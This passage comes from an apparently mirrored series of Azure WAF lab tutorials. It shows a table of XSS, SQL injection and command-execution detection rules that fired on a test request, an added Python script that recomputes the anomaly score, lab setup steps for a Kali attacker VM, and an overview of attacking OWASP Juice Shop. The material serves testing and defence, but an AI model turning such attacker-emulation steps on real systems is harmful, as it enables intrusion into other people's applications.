below table shows an extract of the <STRONG>Top 50 event trigger, filter by rule name </STRONG>output for request with the XSS traffic.&nbsp; This data shows that the WAF evaluated the POC payload in the HTTP request to detect XSS injection and therefore blocked it</LI> </OL> <P>&nbsp;</P> <TABLE border="1" width="99.86187845303867%"> <TBODY> <TR> <TD width="89.77900552486187%" height="30px"> <P><STRONG>Rule</STRONG></P> </TD> <TD width="10.082872928176796%" height="30px"> <P><STRONG>count_</STRONG></P> </TD> </TR> <TR> <TD width="89.77900552486187%" height="30px"> <P>Remote Command Execution: Unix Shell Expression Found</P> </TD> <TD width="10.082872928176796%" height="30px"> <P>1</P> </TD> </TR> <TR> <TD width="89.77900552486187%" height="30px"> <P>XSS Attack Detected via libinjection</P> </TD> <TD width="10.082872928176796%" height="30px"> <P>1</P> </TD> </TR> <TR> <TD width="89.77900552486187%" height="30px"> <P>XSS Filter - Category 4: Javascript URI Vector</P> </TD> <TD width="10.082872928176796%" height="30px"> <P>1</P> </TD> </TR> <TR> <TD width="89.77900552486187%" height="30px"> <P>NoScript XSS InjectionChecker: HTML Injection</P> </TD> <TD width="10.082872928176796%" height="30px"> <P>1</P> </TD> </TR> <TR> <TD width="89.77900552486187%" height="30px"> <P>NoScript XSS InjectionChecker: Attribute Injection</P> </TD> <TD width="10.082872928176796%" height="30px"> <P>1</P> </TD> </TR> <TR> <TD width="89.77900552486187%" height="30px"> <P>IE XSS Filters - Attack Detected.</P> </TD> <TD width="10.082872928176796%" height="30px"> <P>1</P> </TD> </TR> <TR> <TD width="89.77900552486187%" height="30px"> <P>XSS Filter - Category 5: Disallowed HTML Attributes</P> </TD> <TD width="10.082872928176796%" height="30px"> <P>1</P> </TD> </TR> <TR> <TD width="89.77900552486187%" height="30px"> <P>Possible XSS Attack Detected - HTML Tag Handler</P> </TD> <TD width="10.082872928176796%" height="30px"> <P>1</P> </TD> </TR> <TR> <TD width="89.77900552486187%" height="30px"> 
<P>SQL Injection Attack: SQL Tautology Detected.</P> </TD> <TD width="10.082872928176796%" height="30px"> <P>1</P> </TD> </TR> <TR> <TD width="89.77900552486187%" height="30px"> <P>Detects basic SQL authentication bypass attempts 3/3</P> </TD> <TD width="10.082872928176796%" height="30px"> <P>1</P> </TD> </TR> <TR> <TD width="89.77900552486187%" height="57px"> <P>Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)</P> </TD> <TD width="10.082872928176796%" height="57px"> <P>1</P> </TD> </TR> </TBODY> </TABLE> <P>&nbsp;</P> <P>&nbsp;</P> <H2>Key Takeaway</H2> <P>&nbsp;</P> <P>Cross Site Scripting (XSS) is one of the most common types of application security vulnerability, and an external adversary can easily exploit a vulnerable application to compromise the application and its users and to elevate their privileges.</P> <P>&nbsp;</P> <P><STRONG>For web applications secured with it, Azure WAF can protect against XSS attacks by detecting and blocking XSS payloads at the network edge, with its out of the box ruleset.</STRONG></P> <P>&nbsp;</P> <P>&nbsp;</P> <P>&nbsp;</P> <TABLE border="1" width="100%"> <TBODY> <TR> <TD width="50%"> <H4>Previous: <A style="font-family: inherit; font-size: 18px;" title="Reconnaissance Playbook" href="https://gorovian.000webhostapp.com/?exam=t5/azure-network-security/part-2-reconnaissance-playbook-azure-waf-security-protection-and/ba-p/2030751" target="_blank" rel="noopener">Reconnaissance Playbook</A></H4> </TD> <TD width="50%"> <H4>Next:&nbsp;<A title="Data Disclosure and Exfiltration Playbook" href="https://gorovian.000webhostapp.com/?exam=t5/azure-network-security/part-4-data-disclosure-and-exfiltration-playbook-azure-waf/ba-p/2031269" target="_blank" rel="noopener">Data Disclosure and Exfiltration Playbook</A></H4> </TD> </TR> </TBODY> </TABLE> <H4>&nbsp;</H4> <P>&nbsp;</P> <P>&nbsp;</P> <P>&nbsp;</P> Fri, 15 Jan 2021 02:06:06 GMT 
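<P>The figure reported in the <STRONG>Message, full details</STRONG> pane of the exploitation playbook above (Total Score: 53, XSS=35) can be reproduced from its rule table: in anomaly-scoring mode every matched rule adds points according to its severity, and the request is blocked once the total reaches the threshold. The following Python is an added example, not part of the original article or of Azure WAF; the record shape, the transaction IDs and the per-rule severities are assumptions, with the severities chosen as the CRS values that reproduce the page's figures.</P>

```python
import json
from collections import defaultdict

# Points added per matched rule, by severity, in OWASP CRS 3.x anomaly
# scoring, and the default total at which a request is blocked.
SEVERITY_POINTS = {"CRITICAL": 5, "ERROR": 4, "WARNING": 3, "NOTICE": 2}
BLOCK_THRESHOLD = 5

PUNCT_RULE = ("Restricted SQL Character Anomaly Detection (args): "
              "# of special characters exceeded (12)")

# Rule messages from the workbook table -> (category, severity).
# ASSUMPTION: the page does not list severities; these are the CRS
# severities that reproduce its "Total Score: 53, XSS=35".
RULES = {
    "Remote Command Execution: Unix Shell Expression Found": ("RCE", "CRITICAL"),
    "XSS Attack Detected via libinjection": ("XSS", "CRITICAL"),
    "XSS Filter - Category 4: Javascript URI Vector": ("XSS", "CRITICAL"),
    "NoScript XSS InjectionChecker: HTML Injection": ("XSS", "CRITICAL"),
    "NoScript XSS InjectionChecker: Attribute Injection": ("XSS", "CRITICAL"),
    "IE XSS Filters - Attack Detected.": ("XSS", "CRITICAL"),
    "XSS Filter - Category 5: Disallowed HTML Attributes": ("XSS", "CRITICAL"),
    "Possible XSS Attack Detected - HTML Tag Handler": ("XSS", "CRITICAL"),
    "SQL Injection Attack: SQL Tautology Detected.": ("SQLI", "CRITICAL"),
    "Detects basic SQL authentication bypass attempts 3/3": ("SQLI", "CRITICAL"),
    PUNCT_RULE: ("SQLI", "WARNING"),
}


def _entry(tx_id, action, message):
    """Build one constructed, simplified log line (field names are assumptions)."""
    return json.dumps({"transactionId": tx_id, "requestUri": "/api/Feedbacks/",
                       "action": action, "message": message})


# Constructed sample: the blocked XSS request, a request that only trips the
# WARNING-level rule, and one malformed line.
SAMPLE_LOG = (
    [_entry("tx-xss", "Matched", msg) for msg in RULES]
    + [_entry("tx-xss", "Blocked", "Mandatory rule (constructed text)"),
       _entry("tx-punct", "Matched", PUNCT_RULE),
       "truncated-line-not-json"]
)


def score_transactions(log_lines):
    """Group log lines by transaction and rebuild each anomaly score."""
    acc = defaultdict(lambda: {"total": 0, "by_category": defaultdict(int),
                               "unscored": [], "seen": set()})
    for line in log_lines:
        try:
            rec = json.loads(line)
        except json.JSONDecodeError:
            continue  # skip malformed lines instead of failing the whole run
        if not isinstance(rec, dict) or "transactionId" not in rec:
            continue
        tx = acc[rec["transactionId"]]
        message = rec.get("message")
        rule = RULES.get(message)
        if rule is None:
            # The blocking decision is logged as its own entry; it adds no points.
            tx["unscored"].append(message)
            continue
        if message in tx["seen"]:
            continue  # a rule contributes once per request
        tx["seen"].add(message)
        category, severity = rule
        points = SEVERITY_POINTS[severity]
        tx["total"] += points
        tx["by_category"][category] += points
    return {
        tx_id: {"total": tx["total"],
                "by_category": dict(tx["by_category"]),
                "unscored": tx["unscored"],
                # Blocking compares with greater-or-equal against the threshold.
                "would_block": tx["total"] >= BLOCK_THRESHOLD}
        for tx_id, tx in acc.items()
    }


if __name__ == "__main__":
    for tx_id, result in score_transactions(SAMPLE_LOG).items():
        print(tx_id, result)
```

<P>A single CRITICAL match is already enough to reach the threshold, which is why the lone WARNING-level match in the second constructed request is logged but would not be blocked on its own.</P>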
https://gorovian.000webhostapp.com/?exam=t5/azure-network-security/part-3-vulnerability-exploitation-playbook-azure-waf-security/ba-p/2031047 Mohit_Kumar 2021-01-15T02:06:06Z Part 1 - Lab Setup: Azure WAF Security Protection and Detection Lab https://gorovian.000webhostapp.com/?exam=t5/azure-network-security/part-1-lab-setup-azure-waf-security-protection-and-detection-lab/ba-p/2030469 <H2>&nbsp;</H2> <P>&nbsp;</P> <P>&nbsp;</P> <H2><FONT size="6">Tutorial: Setup an Azure WAF Security Protection and Detection Lab</FONT></H2> <P>&nbsp;</P> <P>&nbsp;</P> <P>&nbsp;</P> <P>The purpose of the Azure WAF security protection and detection lab tutorial is to demonstrate <STRONG>Azure Web Application Firewall (WAF)</STRONG> capabilities in identifying, detecting, and protecting against suspicious activities and potential attacks against your Web Applications.&nbsp; This first tutorial in a four-part series walks you through creating a lab environment for testing against Azure WAF's protections.&nbsp; This lab focuses on the OWASP protection ruleset and logging capabilities of Azure WAF.&nbsp; The lab does not include advanced application security concepts and is not intended to be a reference for application security testing as these areas are broader than the use cases demonstrated herein.&nbsp; For more information about each tutorial in this series, refer to the previous section, <A title="Tutorial Overview" href="https://gorovian.000webhostapp.com/?exam=t5/azure-network-security/tutorial-overview-azure-web-application-firewall-security/ba-p/2030423" target="_blank" rel="noopener">Tutorial Overview</A>.</P> <P>&nbsp;</P> <P>In this tutorial you will:</P> <OL> <LI>Deploy a demo test environment in Azure</LI> <LI>Deploy Azure Monitor Workbook for WAF</LI> <LI>Enable desktop environment on Linux VM</LI> <LI>Create host file entries to resolve host names</LI> </OL> <P>&nbsp;</P> <P>&nbsp;</P> <H2>Prerequisites</H2> <P>&nbsp;</P> <OL> <LI>An Azure subscription to deploy 
the&nbsp;<A title="Azure WAF Attack Testing Lab Environment Deployment Template" href="#" target="_blank" rel="noopener noopener noreferrer noopener noreferrer">Azure WAF Attack Testing Lab Environment Deployment Template</A><BR /> <UL> <LI>Do not have an Azure subscription? <A title="Create a free Azure account" href="#" target="_blank" rel="noopener">Create a free account</A></LI> </UL> </LI> <LI>A Log Analytics workspace to send all diagnostic logs <UL> <LI>Azure Monitor Workbook for WAF deployed to the same workspace</LI> </UL> </LI> <LI>Familiarity with Azure <STRONG>Application Gateway WAF</STRONG></LI> </OL> <P>&nbsp;</P> <P>&nbsp;</P> <H2>Deployment Steps</H2> <P>&nbsp;</P> <OL> <LI><A title="Deploy Azure WAF Attack Testing Lab Environment" href="#" target="_blank" rel="noopener">Click here</A> to deploy the lab environment to your Azure subscription</LI> <LI><A title="Azure Monitor Workbook for WAF " href="#" target="_blank" rel="noopener">Click here</A> to deploy the Azure Monitor Workbook for WAF to your Azure subscription</LI> </OL> <UL class="lia-list-style-type-square"> <LI><STRONG><FONT size="2">Tip:</FONT> &nbsp;</STRONG><FONT size="2">For more information, refer to the detailed deployment instructions here -&nbsp;<A href="https://gorovian.000webhostapp.com/?exam=t5/azure-network-security/azure-network-security-proof-of-concept-part-2-deploying-the/ba-p/1773168" target="_blank" rel="noopener">Deploying Network security demo environment</A></FONT> <UL class="lia-list-style-type-circle"> <LI><FONT size="2">Please refer to the above document for deployment instructions only and do not use the deployment template linked in it.&nbsp; The deployment template used in these lab tutorials is different from the one used in the deployment instructions document</FONT></LI> </UL> </LI> </UL> <P><STRONG>&nbsp;</STRONG></P> <P>&nbsp;</P> <H2>Recommendations</H2> <P>&nbsp;</P> <P>We recommend using the&nbsp;<A title="Azure WAF Attack Testing Lab Environment 
Deployment Template" href="#" target="_blank" rel="noopener noopener noreferrer">Azure WAF Attack Testing Lab Environment Deployment Template</A>&nbsp;as it already contains all the components needed for this lab including a customized version of the OWASP Juice Shop application.&nbsp; The closer your lab is to the suggested lab setup, the easier it will be to follow the Azure WAF testing procedures.&nbsp; After deployment and minimum configuration steps, you will be ready to perform actions with the suggested hacking research tools and review Azure WAF's protections against those malicious actions.&nbsp;</P> <P>&nbsp;</P> <P data-unlink="true">When using the&nbsp;Azure WAF Attack Testing Lab Environment Deployment Template,&nbsp;additional resources such as VMs and Azure Front Door will be deployed. &nbsp;The below diagram represents resources in the environment which are utilized in this lab.&nbsp; The resources which are not used in this lab have been grayed out (VMs, Azure Front Door, DDoS Protection).</P> <P>&nbsp;</P> <P><FONT size="2"><FONT color="#FF0000"><STRONG>!</STRONG></FONT><STRONG> IMPORTANT:</STRONG> &nbsp;This environment will be used as the baseline for the remainder of this document and the tutorial</FONT></P> <TABLE width="634"> <TBODY> <TR> <TD width="634"><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="Mohit_Kumar_1-1609788007370.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/243940iE61E0E98CBEC68D5/image-size/large?v=v2&amp;px=999" role="button" title="Mohit_Kumar_1-1609788007370.png" alt="Mohit_Kumar_1-1609788007370.png" /></span></TD> </TR> </TBODY> </TABLE> <P>&nbsp;</P> <P>In this setup, traffic from the attacker machine (Kali VM) will be routed to the internet through the Azure Firewall.&nbsp; Successful attack path is one where malicious data is sent directly by the attacker to the <STRONG>OWASP Juice Shop</STRONG> web application leading to 
successful exploitation.&nbsp; Attack path defended by WAF represents the path where malicious data is inspected by Azure WAF (on Azure Application Gateway) and blocked with its out of the box ruleset before it reaches the web application.</P> <P>&nbsp;</P> <P>You can also use a preexisting environment for this lab. &nbsp;For completing these tutorials, your environment must have the following key components:</P> <P>&nbsp;</P> <OL> <LI>An instance of the customized OWASP Juice Shop web application with an internet accessible endpoint</LI> <LI>An instance of Application Gateway with Azure WAF which publishes the OWASP Juice Shop web application to the internet</LI> <LI>An attacker machine (VM) with common hacking tools and internet connectivity.&nbsp; We use Kali Linux as the attacker VM</LI> </OL> <P>&nbsp;</P> <P>If manually deploying the components required for this tutorial, your complete lab setup should look as similar as possible to the following diagram:</P> <P>&nbsp;</P> <TABLE width="631"> <TBODY> <TR> <TD width="631"><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="Mohit_Kumar_0-1609788486015.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/243942i59D85566B9E8994C/image-size/large?v=v2&amp;px=999" role="button" title="Mohit_Kumar_0-1609788486015.png" alt="Mohit_Kumar_0-1609788486015.png" /></span></TD> </TR> </TBODY> </TABLE> <P>&nbsp;</P> <P>&nbsp;</P> <H2>Resources</H2> <P>&nbsp;</P> <P>The below table details the resources needed from all resources deployed with the <A title="Azure WAF Attack Testing Lab Environment Deployment Template" href="#" target="_blank" rel="noopener">Azure WAF Attack Testing Lab Environment Deployment Template</A>.&nbsp;</P> <P>&nbsp;</P> <TABLE border="1" width="99.86187845303867%"> <TBODY> <TR> <TD width="16.574585635359114%"> <P><STRONG>Resource</STRONG></P> </TD> <TD width="25.276243093922652%"> <P><STRONG>Name</STRONG></P> </TD> <TD 
width="11.464088397790055%"> <P><STRONG>IP Address Type</STRONG></P> </TD> <TD width="46.54696132596685%"> <P><STRONG>Purpose</STRONG></P> </TD> </TR> <TR> <TD width="16.574585635359114%"> <P>Virtual Machine</P> </TD> <TD width="25.276243093922652%"> <P>VM-Kali</P> </TD> <TD width="11.464088397790055%"> <P>Private only</P> </TD> <TD width="46.54696132596685%"> <P>Attacker VM (<A href="#" target="_blank" rel="noopener">Kali Linux</A>) with preinstalled vulnerability and penetration testing tools</P> </TD> </TR> <TR> <TD width="16.574585635359114%"> <P>Firewall</P> </TD> <TD width="25.276243093922652%"> <P>SOC-NS-FW</P> </TD> <TD width="11.464088397790055%"> <P>Private &amp; Public</P> </TD> <TD width="46.54696132596685%"> <P>Azure Firewall for outbound and inbound traffic restrictions and inspection</P> </TD> </TR> <TR> <TD width="16.574585635359114%"> <P>Azure WAF on Application Gateway</P> </TD> <TD width="25.276243093922652%"> <P>SOC-NS-AG-WAFv2</P> </TD> <TD width="11.464088397790055%"> <P>Private &amp; Public</P> </TD> <TD width="46.54696132596685%"> <P>Azure Web Application Firewall preventing threats to the OWASP web application published through Application Gateway</P> </TD> </TR> <TR> <TD width="16.574585635359114%"> <P>OWASP WebApp</P> </TD> <TD width="25.276243093922652%"> <P>owaspdirect-&lt;deployment guid&gt;.azurewebsites.net</P> </TD> <TD width="11.464088397790055%"> <P>Public only</P> </TD> <TD width="46.54696132596685%"> <P><A href="#" target="_blank" rel="noopener">OWASP Juice Shop</A> Application.&nbsp; An open source web application with built in security vulnerabilities and CTF challenges</P> </TD> </TR> </TBODY> </TABLE> <P><FONT style="font-size: small; font-family: inherit;" color="#FF0000"><STRONG>!</STRONG></FONT><STRONG style="font-size: small; font-family: inherit;"> IMPORTANT</STRONG><SPAN style="font-size: small; font-family: inherit;">: &nbsp;For the scenarios demonstrated in this document, OWASP Juice Shop application was running on 
HTTP port 3000.&nbsp; This is not the case when you use the Azure WAF Attack Testing Lab Environment Deployment Template as it configures the application to run on port 80, 443 and assigns it a URL.&nbsp; For the lab tutorials, you will connect to the application on HTTP port 80 only. &nbsp;The URL for the application will be http://owaspdirect-&lt;deployment guid&gt;.azurewebsites.net.&nbsp;&nbsp;</SPAN></P> <P>&nbsp;</P> <UL class="lia-list-style-type-square"> <LI><FONT size="2"><STRONG>Tip</STRONG>: As it is a security best practice, we strongly recommend that you change the default lab password after deployment</FONT></LI> </UL> <P>&nbsp;</P> <H2>Configuration</H2> <P>&nbsp;</P> <P>Additional configuration is required on the Kali Linux VM before getting started on the lab exercises.&nbsp; The Kali VM in this lab environment needs remote desktop environment installed and configured.&nbsp; Please complete the steps in the order outlined below.</P> <P>&nbsp;</P> <P>&nbsp;</P> <H3><FONT size="3">Updating Kali Linux and Installing Desktop Environment</FONT></H3> <P>&nbsp;</P> <OL> <LI>Launch PowerShell on your local machine and run the following command to connect to the Kali VM</LI> </OL> <P class="lia-indent-padding-left-60px">&nbsp;</P> <P class="lia-indent-padding-left-60px"><FONT size="3"><STRONG>ssh svradmin@&lt;Public IP Address of Azure Firewall&gt;</STRONG>&nbsp;</FONT></P> <P class="lia-indent-padding-left-60px"><FONT size="3"><STRONG>&lt;</STRONG><EM>Type your password when prompted to login</EM><STRONG>&gt;</STRONG></FONT></P> <P>&nbsp;</P> <UL class="lia-list-style-type-square"> <LI><FONT size="2"><STRONG>Tips: </STRONG></FONT> <UL class="lia-list-style-type-circle"> <LI><FONT size="2">You can find the public IP of Azure Firewall in the Azure Portal under <STRONG>Resource Group --&gt; SOC-NS-FW --&gt; Public IP configuration</STRONG></FONT></LI> <LI><FONT size="2">You can also use <A href="#" target="_blank" rel="noopener">Putty client</A> on your local 
machine to connect to the Kali VM</FONT></LI> </UL> </LI> </UL> <P>&nbsp;</P> <OL start="2"> <LI>Once connected to the Kali VM with SSH, run the following command to update the Kali Linux distro</LI> </OL> <P>&nbsp;</P> <P class="lia-indent-padding-left-60px"><STRONG>sudo apt-get update</STRONG></P> <P class="lia-indent-padding-left-60px"><STRONG>&lt;</STRONG><EM>Type your password when prompted</EM><STRONG>&gt;</STRONG></P> <P><STRONG>&nbsp;</STRONG></P> <OL start="3"> <LI>Once the Kali Linux distro is updated, run the following command to install and configure the remote desktop server on the Kali VM</LI> </OL> <P>&nbsp;</P> <P class="lia-indent-padding-left-60px">a.<STRONG> sudo apt-get -y install xrdp</STRONG></P> <P class="lia-indent-padding-left-60px">b.<STRONG> sudo</STRONG> <STRONG>systemctl enable xrdp</STRONG></P> <P class="lia-indent-padding-left-60px">c.<STRONG> echo</STRONG> <STRONG>xfce4-session &gt;~/.xsession</STRONG></P> <P class="lia-indent-padding-left-60px">d.<STRONG> sudo</STRONG> <STRONG>service xrdp restart</STRONG></P> <P><STRONG>&nbsp;</STRONG></P> <UL class="lia-list-style-type-square"> <LI><FONT size="2"><STRONG>Tip: &nbsp;</STRONG>For more information, refer to the step by step instructions to Install Desktop Environment on Linux VMs - <A title="Install and configure Remote Desktop to connect to a Linux VM in Azure" href="#" target="_blank" rel="noopener">Install and configure Remote Desktop to connect to a Linux VM in Azure</A>&nbsp;</FONT></LI> </UL> <P>&nbsp;</P> <OL start="4"> <LI>Upon completing the abovementioned steps, you should be able to connect to the Kali VM over RDP on port 33892&nbsp;</LI> </OL> <P>&nbsp;</P> <P class="lia-indent-padding-left-60px">a. 
Connect to the Kali VM over RDP by using the following IP address and port combination</P> <P class="lia-indent-padding-left-60px">&nbsp;</P> <P class="lia-indent-padding-left-90px"><STRONG>&lt;Public IP Address of Azure Firewall&gt;:33892</STRONG>&nbsp;</P> <P class="lia-indent-padding-left-60px">&nbsp;</P> <P class="lia-indent-padding-left-60px">b. When prompted to choose the setup for the first startup, click to select “Use default config”</P> <P class="lia-indent-padding-left-60px">&nbsp;</P> <P class="lia-indent-padding-left-90px"><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="Mohit_Kumar_0-1609793055165.png" style="width: 400px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/243952iC3F0CF46FCC97E01/image-size/medium?v=v2&amp;px=400" role="button" title="Mohit_Kumar_0-1609793055165.png" alt="Mohit_Kumar_0-1609793055165.png" /></span></P> <P class="lia-indent-padding-left-60px"><BR />c. You can now close your SSH session to the Kali VM by typing “exit” in the SSH session running in PowerShell</P> <P>&nbsp;</P> <OL start="5"> <LI>Create an entry in the HOSTS file on Kali VM to map a name to the Public IP address of the OWASP Juice Shop site published on Application Gateway</LI> </OL> <P>&nbsp;</P> <P class="lia-indent-padding-left-60px">a. Launch Terminal and run the following command</P> <P class="lia-indent-padding-left-60px">&nbsp;</P> <P class="lia-indent-padding-left-90px"><STRONG>sudo nano /etc/hosts</STRONG></P> <P class="lia-indent-padding-left-90px"><STRONG>&lt;</STRONG><EM>Type your password when prompted</EM><STRONG>&gt;</STRONG></P> <P><STRONG>&nbsp;</STRONG></P> <P class="lia-indent-padding-left-60px">b. 
Create the following entry</P> <P class="lia-indent-padding-left-90px">&nbsp;</P> <P class="lia-indent-padding-left-90px"><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="Mohit_Kumar_0-1609794465822.png" style="width: 400px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/243988iF9D86A3D4FF5AA80/image-size/medium?v=v2&amp;px=400" role="button" title="Mohit_Kumar_0-1609794465822.png" alt="Mohit_Kumar_0-1609794465822.png" /></span></P> <P>&nbsp;</P> <P class="lia-indent-padding-left-60px">c. Save the hosts file and exit</P> <P class="lia-indent-padding-left-60px">&nbsp;</P> <P class="lia-indent-padding-left-90px"><SPAN style="font-family: inherit;">Use <STRONG>Ctrl+S</STRONG> to save and <STRONG>Ctrl+X</STRONG> to exit</SPAN></P> <P>&nbsp;</P> <UL class="lia-list-style-type-square"> <LI><FONT size="2"><STRONG>Tip: &nbsp;</STRONG>You can find public IP of the Application Gateway in the Azure Portal under <STRONG>Resource Group --&gt; SOC-NS-AG-WAFv2 --&gt; Frontend Public IP address</STRONG></FONT></LI> </UL> <P>&nbsp;</P> <P>&nbsp;</P> <H2>Next Steps</H2> <P>&nbsp;</P> <P>Before proceeding to the next tutorial, take a few mins to review the following</P> <P>&nbsp;</P> <OL> <LI>OWASP Juice Shop publishing rule on Application Gateway</LI> <LI>Web Application Firewall configuration on Application Gateway</LI> <LI>Test connectivity to the OWASP Juice Shop website when accessing the application directly and when going to it through the Application Gateway</LI> </OL> <P>&nbsp;</P> <UL class="lia-list-style-type-square"> <LI><FONT size="2"><STRONG>Tip:&nbsp; </STRONG>You can find the public URL of the deployed Juice Shop app in the Azure Portal under <STRONG>Resource Group --&gt;&nbsp; owaspdirect-&lt;guid&gt; --&gt; URL</STRONG></FONT></LI> </UL> <P>&nbsp;</P> <P>&nbsp;</P> <P>&nbsp;</P> <TABLE border="1" width="100%"> <TBODY> <TR> <TD width="50%" class="lia-align-left"> <H4>Previous: <A title="Tutorial Overview" 
href="https://gorovian.000webhostapp.com/?exam=t5/azure-network-security/tutorial-overview-azure-web-application-firewall-security/ba-p/2030423" target="_blank" rel="noopener">Tutorial Overview</A></H4> </TD> <TD width="50%" class="lia-align-left"> <H4>Next:&nbsp;<A title="Reconnaissance Playbook" href="https://gorovian.000webhostapp.com/?exam=t5/azure-network-security/part-2-reconnaissance-playbook-azure-waf-security-protection-and/ba-p/2030751" target="_blank" rel="noopener">Reconnaissance Playbook</A></H4> </TD> </TR> </TBODY> </TABLE> <H4>&nbsp;</H4> <P>&nbsp;</P> <P>&nbsp;</P> <P>&nbsp;</P> Fri, 15 Jan 2021 17:03:38 GMT https://gorovian.000webhostapp.com/?exam=t5/azure-network-security/part-1-lab-setup-azure-waf-security-protection-and-detection-lab/ba-p/2030469 Mohit_Kumar 2021-01-15T17:03:38Z Tutorial Overview: Azure Web Application Firewall Security Protection and Detection Lab https://gorovian.000webhostapp.com/?exam=t5/azure-network-security/tutorial-overview-azure-web-application-firewall-security/ba-p/2030423 <H2>&nbsp;</H2> <P>&nbsp;</P> <P>&nbsp;</P> <H2>Introduction</H2> <P>&nbsp;</P> <P>&nbsp;</P> <P>Customers often want to test and validate the capabilities of products before using them in mission critical environments.&nbsp; The same is true for <STRONG>Azure Web Application Firewall (WAF)</STRONG>, where customers often need to test its security capabilities and validate their effectiveness before deciding to secure their production workloads with it.</P> <P>&nbsp;</P> <P>To help customers rapidly validate the effectiveness of Azure WAF against real world web application attacks, we have&nbsp;designed this <STRONG>four</STRONG>-part lab tutorial.&nbsp; Part one of the tutorial provides guidance to quickly deploy a test environment with all required components.&nbsp; Parts two through four provide step by step walkthroughs for attacking a vulnerable web application with&nbsp;common, real-world, publicly available hacking and attack 
tools.</P> <H2>&nbsp;</H2> <P>&nbsp;</P> <P>&nbsp;</P> <H2>Tutorial Overview</H2> <P>&nbsp;</P> <P>&nbsp;</P> <P>The purpose of the Azure WAF security protection and detection lab tutorial is to demonstrate <STRONG>Azure Web Application Firewall (WAF)</STRONG> capabilities in identifying, detecting, and protecting against suspicious activities and potential attacks against your Web Applications.&nbsp; In this <STRONG>four</STRONG>-part tutorial, you will learn how to</P> <P>&nbsp;</P> <OL> <LI>Configure the working environment to test Azure WAF protection against web application attacks</LI> <LI>Emulate an adversary by attacking and exploiting a vulnerable web application using step by step instructions</LI> <LI>Review <A title="Azure Monitor Workbook for WAF" href="#" target="_blank" rel="noopener"><STRONG>Azure Monitor Workbook for WAF</STRONG></A> to understand WAF detection and processing logic for specific attack patterns used in every tutorial</LI> </OL> <P>&nbsp;</P> <P>The lab tutorials provide walkthroughs for running successful attacks against the vulnerable <A href="#" target="_blank" rel="noopener"><STRONG>OWASP Juice Shop</STRONG></A> web application when it is exposed to the internet directly, without Azure WAF.&nbsp; The tutorials then also demonstrate effectiveness of <STRONG>Azure WAF on Application Gateway</STRONG> in blocking the same attacks against the same instance of the vulnerable OWASP Juice Shop Application when it is protected by Azure WAF<STRONG>.</STRONG></P> <P>&nbsp;</P> <P>This lab focuses on the OWASP protection ruleset and logging capabilities of Azure WAF.&nbsp; The lab does not include advanced application security concepts and is not intended to be a reference for application security testing as these areas are broader than the use cases demonstrated herein.</P> <P>&nbsp;</P> <P>&nbsp;</P> <H3>Part 1 - Lab Setup</H3> <P>&nbsp;</P> <P>The first tutorial in this four-part series walks you through deploying/creating a lab 
environment for testing Azure WAF protection and logging capabilities.&nbsp; The tutorial includes information about machines and tools that are needed to set up the lab and complete its playbooks.&nbsp; The instructions assume you are comfortable with deploying and administering resources in Azure and have some familiarity with web application security concepts.&nbsp; The closer your lab is to the suggested lab setup, the easier it will be to follow Azure WAF testing procedures.&nbsp; When your lab setup is complete, use the Azure WAF Security Protection and Detection playbooks for testing.</P> <P>&nbsp;</P> <P><A title="Setup an Azure WAF Attack Testing Lab" href="https://gorovian.000webhostapp.com/?exam=t5/azure-network-security/part-1-lab-setup-azure-web-application-firewall-security/ba-p/2030469" target="_blank" rel="noopener">Setup an Azure WAF Attack Testing Lab</A>&nbsp;</P> <P>&nbsp;</P> <P>&nbsp;</P> <H3>Part 2 - Reconnaissance Playbook</H3> <P>&nbsp;</P> <P>The second tutorial in this four-part series is a reconnaissance playbook.&nbsp; Reconnaissance activities allow attackers to gain a thorough understanding and complete mapping of your web application for later use.&nbsp; The playbook shows Azure WAF capabilities in identifying, detecting, and protecting against suspicious activities from potential recon attacks using examples from common, publicly available hacking and attack tools.</P> <P>&nbsp;</P> <P><A title="Reconnaissance Playbook" href="https://gorovian.000webhostapp.com/?exam=t5/azure-network-security/part-2-reconnaissance-playbook-azure-waf-security-protection-and/ba-p/2030751" target="_blank" rel="noopener">Reconnaissance Playbook</A></P> <P>&nbsp;</P> <P>&nbsp;</P> <H3>Part 3 - Vulnerability Exploitation Playbook</H3> <P>&nbsp;</P> <P>The vulnerability exploitation playbook is third in the four-part tutorial series.&nbsp; In the exploitation phase, an attacker attempts to exploit a known or previously identified vulnerability with intent 
to elevate privileges.&nbsp; As you run through this playbook, you will see <STRONG>Cross Site Scripting (XSS)</STRONG> detections and rules get triggered on Azure WAF from the attack you will simulate in your lab.</P> <P>&nbsp;</P> <P data-unlink="true">Cross Site Scripting (XSS)&nbsp;attacks are performed against web applications with the intent of compromising end users or the application itself.</P> <P>&nbsp;</P> <P><A title="Vulnerability Exploitation Playbook" href="https://gorovian.000webhostapp.com/?exam=t5/azure-network-security/part-3-vulnerability-exploitation-playbook-azure-waf-security/ba-p/2031047" target="_blank" rel="noopener">Vulnerability Exploitation Playbook</A>&nbsp;</P> <P>&nbsp;</P> <P>&nbsp;</P> <H3>Part 4 - Data Disclosure and Exfiltration Playbook</H3> <P>&nbsp;</P> <P>The last tutorial in the four-part series is the data exfiltration playbook. During the data exfiltration phase, an attacker has already gained access to your application backend and attempts to disclose and copy sensitive data.&nbsp; You will simulate an <STRONG>SQL Injection (SQLi)</STRONG> attack to see the attack detection and protection capability of Azure WAF.</P> <P>&nbsp;</P> <P data-unlink="true">SQL Injection (SQLi)&nbsp;attacks are performed against web applications with the intent of exposing/exfiltrating sensitive application and user data.</P> <P>&nbsp;</P> <P><A title="Data Disclosure and Exfiltration Playbook" href="https://gorovian.000webhostapp.com/?exam=t5/azure-network-security/part-4-data-disclosure-and-exfiltration-playbook-azure-waf/ba-p/2031269" target="_blank" rel="noopener">Data Disclosure and Exfiltration Playbook</A></P> <P>&nbsp;</P> <P>&nbsp;</P> <P>&nbsp;</P> <H4>Next:&nbsp;<A title="Setup an Azure WAF Attack Testing Lab" href="https://gorovian.000webhostapp.com/?exam=t5/azure-network-security/part-1-lab-setup-azure-web-application-firewall-security/ba-p/2030469" target="_blank" rel="noopener">Setup an 